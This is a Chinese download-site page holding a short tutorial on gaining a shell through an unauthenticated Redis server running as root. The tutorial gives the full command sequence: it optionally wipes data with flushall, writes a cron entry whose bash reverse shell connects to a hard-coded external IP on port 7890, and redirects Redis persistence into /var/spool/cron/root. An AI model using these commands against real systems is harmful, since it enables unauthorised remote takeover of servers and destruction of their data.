没有合适的资源?快使用搜索试试~ 我知道了~
redis权限webshell1
资源推荐
资源详情
资源评论
Redis 到GET SHELL
背景
Redis 默认安装完成后是只能本机访问的并且没有密码。
而一般公司的应用都会需要多台服务器访问 Redis,所以运维就会将
/etc/redis.conf 中的 bind-ip 改为 0.0.0.0,导致外网可以匿名访问
(不需要密码)。
外网可以访问导致的问题是 Redis 数据外泄,这时候还不能造成直接
利用。
但如果 Redis 启动的时候是用 root 账户,则会造成 GET SHELL。
利用方式
通过 Redis 的 config 命令,可以写入任意文件,权限足够的情
况下即可写入定时任务反弹得到 SHELL
# 连上一台 Redis
redis-cli -h your_redis_server
# 保持写入的干净,清除原有数据(如果是其它人机器,不建议这么做)# flushall
# 设置 key(0)为 bash 反弹 shell 的脚本,每分钟执行一次,在自己服务器上监听 7890 端口(nc -vvl
7890)set 0 "\n*/1 * * * * /bin/bash -i >& /dev/tcp/103.21.140.84/7890 0>&1\n"
# 设置保存的位置
config set dir /var/spool/cron/
# 设置保存的文件名
config set dbfilename root
# 保存
save
资源评论
神康不是狗
- 粉丝: 27
- 资源: 338
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功